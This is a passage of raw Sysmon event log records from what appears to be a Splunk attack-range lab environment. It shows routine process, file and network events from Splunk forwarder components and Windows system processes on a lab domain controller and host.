Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D437FD97FF9D8DB6ADEF48D391A5D4B4,SHA256=813609C304A048E74FCA8B7E43DBCBDF984772820D6E4496C5487E267003AE79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224047Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:00.348{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-175MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224049Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:01.894{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F60527A639FD6724CCE672E79100BB9,SHA256=FB6861FCE430BCF734AA2922138789DF364563AC0CA8E04E088D1F3D8237FC8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300245Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:01.628{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AF02AA212D52BB6D8AB9D813C116BD0,SHA256=40F75241BA580D41EF771B83BE77E6D9586277F6D9205A1E59962FC77442BE6D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000300244Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:01.490{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1B31-6216-9A07-000000003802}7052C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300243Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:01.490{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300242Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:01.490{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300241Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:01.490{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300240Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:01.490{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300239Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:01.490{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1B31-6216-9A07-000000003802}7052C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000300238Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:01.490{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1B31-6216-9A07-000000003802}7052C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000300237Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:01.491{C8EA50B7-1B31-6216-9A07-000000003802}7052C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000300255Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:02.862{C8EA50B7-1B32-6216-9B07-000000003802}49846588C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000300254Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:02.662{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58BDCA42ED237D702AC1A8848BA6A190,SHA256=1E4781D70245104944758FBE32382A668E976D7FFDF719174C3077410822ADA6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000300253Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:02.378{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1B32-6216-9B07-000000003802}4984C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300252Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:02.378{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300251Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:02.378{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300250Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:02.378{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300249Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:02.378{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300248Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:02.378{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1B32-6216-9B07-000000003802}4984C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000300247Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:02.378{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1B32-6216-9B07-000000003802}4984C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000300246Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:02.379{C8EA50B7-1B32-6216-9B07-000000003802}4984C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000300264Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:03.677{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EACA715AC5BC43E50B98CF61226421EE,SHA256=E7643747C81CD2311AD97A12BB7C75FF92EFDB686AD1538FF2669142D3CF4CAB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000224051Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:01.634{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51827-false10.0.1.12-8000- 23542300x8000000000000000224050Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:03.020{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9310FD9DE5966285AC1BBA1E710D5FE8,SHA256=944E195DDBA5E41102FEC835087ADA10B807269C6895F99D492761C887C93B5E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000300263Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:03.462{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1B33-6216-9C07-000000003802}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300262Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:03.462{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300261Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:03.462{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300260Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:03.462{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300259Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:03.462{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300258Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:03.462{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1B33-6216-9C07-000000003802}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000300257Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:03.462{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1B33-6216-9C07-000000003802}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program 